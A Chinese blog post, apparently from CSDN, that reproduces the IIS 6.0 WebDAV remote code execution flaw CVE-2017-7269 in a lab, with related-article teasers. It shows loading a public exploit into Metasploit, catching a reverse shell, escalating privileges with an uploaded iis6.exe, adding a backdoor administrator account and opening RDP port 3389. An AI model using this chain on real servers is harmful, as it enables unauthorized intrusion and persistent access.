IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现——踩坑记

最新推荐文章于 2024-08-07 21:20:24 发布
最新推荐文章于 2024-08-07 21:20:24 发布
阅读量2.4k 收藏 6
点赞数
分类专栏: # 中间件漏洞复现&插件漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/105703463
版权

一、漏洞描述

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。

二、影响版本以及利用条件

Windows 2003 R2开启WebDAV服务的IIS6.0

三、漏洞环境搭建

Windows server 2003 R2 安装IIS服务,并且开启了WebDAV
Exp下载地址:https://github.com/zcgonvh/cve-2017-7269
IIS6.exe提权工具
3389.bat

四、漏洞复现

1.IIS开启WebDAV
在这里插入图片描述
工具检测存在CVE-2017-7269漏洞
在这里插入图片描述

2.github下载exp

Exp下载地址:https://github.com/zcgonvh/cve-2017-7269

3.把exp放入到msf中,#注意模块的命名名称,单词之间加下划线

这个地方有个坑,下载的exp:cve-2017-7269 直接放在metasploit中是不能加载识别的,得把cve-2017-7269修改为cve_2017_7269
将桌面上的cve_2017_7269.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/iis/目录下
命令:cp /root/桌面/cve_2017_7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/

给cve_2017_7269.rb执行权限
在这里插入图片描述
打开metasploit重新加载exp模块,加载完模块之后,exp数量会增加1
在这里插入图片描述
4.使用模块,设置参数
在这里插入图片描述
设置参数模块如下设置即可
忘记截图了一个,还有一个命令:set lhost 192.168.36.129(kali地址)
在这里插入图片描述
返回shell,查看当前用户权限,发现是一般用户权限
在这里插入图片描述
cd到网站目录,寻找一个可以创建文件夹的目录,一个一个寻找
在这里插入图片描述
按Ctrl + C退出shell,输出y
在这里插入图片描述

利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)
在这里插入图片描述
又回到shell里面确定工具上传是否成功
在这里插入图片描述

在这里插入图片描述
利用工具进行提权,命令:iis6.exe “whoami”,已经是system权限了
在这里插入图片描述
进行新建用户,iis6.exe “net user xiaohua xiaohua123 /add”
在这里插入图片描述
添加用户到管理员,iis6.exe “net localhost administrators xiaohua /add”
在这里插入图片描述
查看远程连接是否打开,没有打开,命令:netstat -an
在这里插入图片描述
再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)

命令:iis6.exe “3389.bat”
在这里插入图片描述
查看是否打开,netstat -an,已经成功打开
在这里插入图片描述
进行远程连接
在这里插入图片描述

五、修复建议

禁用WebDAV

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述

W小哥1
关注
专栏目录
复现CVE-2017-7269(IIS6.0远程代码执行)漏洞
记录并分享学习安全的知识点..
03-03 1930
前言: 今天小编挖到了一个高危漏洞,打进去以后,给的用户权限太低了,尝试了好久的提权。虽然最后没提权成功,起码也攻进去了,也是可看见系统盘所有目录下所有的关键资料,整理报告完成了也索性就记录一下趴! 警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞介绍 Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞远程攻击者通过以“If: <http://”开头的长header PRO
iis6.0远程代码执行漏洞复现
shatianyzg的博客
06-12 583
iis6.0远程代码执行漏洞复现(CVE-2017-7269) 实验环境搭建 1.目标机:windows server 2003 r2 需要目标服务器开启WebDAV 靶机IP:192.168.75.134 Kali IP : 192.168.75.129 kali中启动Msf,使用CVE-2017-7269攻击插件 use exploit/windows/iis/cve_2017_7269 没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269
iis6.0远程代码执行漏洞
G208_522的博客
11-20 3482
iis6.0远程代码执行漏洞 1、实验环境搭建 目标主机Windows server2003 sp2 2、目标服务器需要在IIS里面开启WebDAV 3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址) Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址) 4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下: k
IIS漏洞大全(附修复方法)
最新发布
C233333235的博客
08-07 1327
IlS Server 在 Web 服务扩展中开启了 WebDAV,配置了可以写入的权限,造成任意文件上传。漏洞复现本地搭建2003 server1)开启 WebDAV 和写权限:做好准备工作后开启环境,然后我们去访问配置的IP,访问到如下页面然后开启抓包刷新页面,在抓到的数据包后将其发送到重放器,将请求方式改为OPTIONS后点击发送,在返回包中就可以看到可以使用的请求方式。
IIS 6.0远程代码执行漏洞CVE-2017-7269
weixin_33737134的博客
03-30 290
  漏洞简介  Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。InternetInformation Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。  Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDA...
学着分析CVE-2017-7269 -- IIS 6.0 WebDAV远程代码执行漏洞
giantbranch的专栏
04-03 7062
简介 CVE编号:CVE-2017-7269 漏洞级别:严重 漏洞影响:Windows Server 2003 r2 IIS6.0 漏洞发现人:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞类型:缓冲区溢出 实验环境 Windows Server 2003 r2 IIS6.0 procexp
CVE-2017-7269 IIS6.0远程代码执行漏洞复现
gp1531620582的博客
06-15 4328
漏洞概况:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞远程攻击者通过以“If: &lt;http://”开头的长header PROPFIND请求,执行任意代码。目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。漏洞复现靶机环境:...
IIS6.0远程代码执行漏洞复现(CVE-2017-7269)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-28 1354
提权文件下载:点此下载 靶机:Windows server 2003 r2 EXP:https://github.com/zcgonvh/cve-2017-7269 把EXP导入Metasploit 启动MSF 尝试加载攻击模块 发现找不到该模块,这是因为msf不识别-,把-改为下划线就好了 重新启动程序 成功加载攻击模块 查看需要设置的参数 设置参数 加载攻击载荷 开始攻击 攻...
IIS6.0漏洞CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 3867
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
CVE-2017-7269 IIS6.0WebDAV远程代码执行漏洞复现(Window提权)
ranuy阮的博客
04-19 2526
漏洞说明:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证) 触发函数:ScStoragePathFromUr...
cve-2017-7269-iis6.0环境搭建及复现过程
04-30
### cve-2017-7269-iis6.0环境搭建及复现过程 #### 一、背景介绍 CVE-2017-7269 是一个针对Microsoft IIS 6.0 WebDAV扩展的远程代码执行漏洞。此漏洞允许攻击者在未经过身份验证的情况下向IIS 6.0服务器发送恶意...
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞iis服务提权工具。
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-05
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
cve-2017-7269-iis6.0 poc metersploit
04-30
cve-2017-7269-iis6.0 的poc 再metersploit中使用,亲测可用。
IIS 6.0远程代码执行漏洞 安全狗可拦截
weixin_33738982的博客
07-05 158
IIS 6.0 被曝出远程 0day,目前已经出现远程利用代码,针对 windows server 2003可以稳定利用,可以远程执行任意代码。 据报告称去年七月起就有攻击者开始利用。建议大家通过扫描检查相关业务系统,并增加 waf 规则或禁用 webdav 特性。 漏洞描述:微软方面也已经确认了该漏洞:Windows Server 2003R2版本...
cve-2017-7269
qfslyy的博客
12-19 2366
CEV-2017-7269(过程,步骤,说明) 1、 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) (只是个人学习笔记) 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) 之后需要将包引入到msf中: 可以选择数据库方式,将cve包导入到msf中,也可以直接将包放在目录:/usr/share/metasploit-framework/modules/exploits/w
CVE-2017-7269iis6.0远程代码执行漏洞复现
热门推荐
Fly_鹏程万里
05-04 1万+
前言趁着有时间,没事干,无聊!所以就拿CVE-2017-7269做一个简单的漏洞复现实战演练!下面就对该漏洞进行简单的简介以及复现漏洞描述漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞描述:IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞...
IIS解析漏洞复现
xj28555的博客
08-13 831
一、IIS6.0 IIS有两种解析漏洞。 第一种是目录解析漏洞 该解析漏洞形成原因是以*.asp命名的文件夹里面的文件都会被当作asp文件解析! 复现 首先我们先搭建一个IIS6.0的服务器,具体搭建方法见https://blog.csdn.net/xj28555/article/details/107951897,文章中还有一些常见的问题也帮大家写出来了。 然后我们创建一个test.txt的文档里面写入hello_world,然后修改后缀名将test.txt改为test.jpg 然后我们
IIS 解析漏洞复现
来日可期的博客
10-12 3276
IIS 7.0/7.5 解析漏洞,在路径的末尾添加一个/.php,页面报错的原因是这里使用的是IIS10.0 该漏洞已被修复。php解释执行是通过php解释器来决定的,这里我们使用phpstudy中的php-cgi.exe。当用户访问phpinfo.php的时候,将该文件找到交给php-cgi.exe来解释执行。修改php.ini文件中的cgi.fix.pathinfo的值为0。将phpinfo.php后缀名修改为png,重新访问页面。在指定目录下创建一个phpinfo.php文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值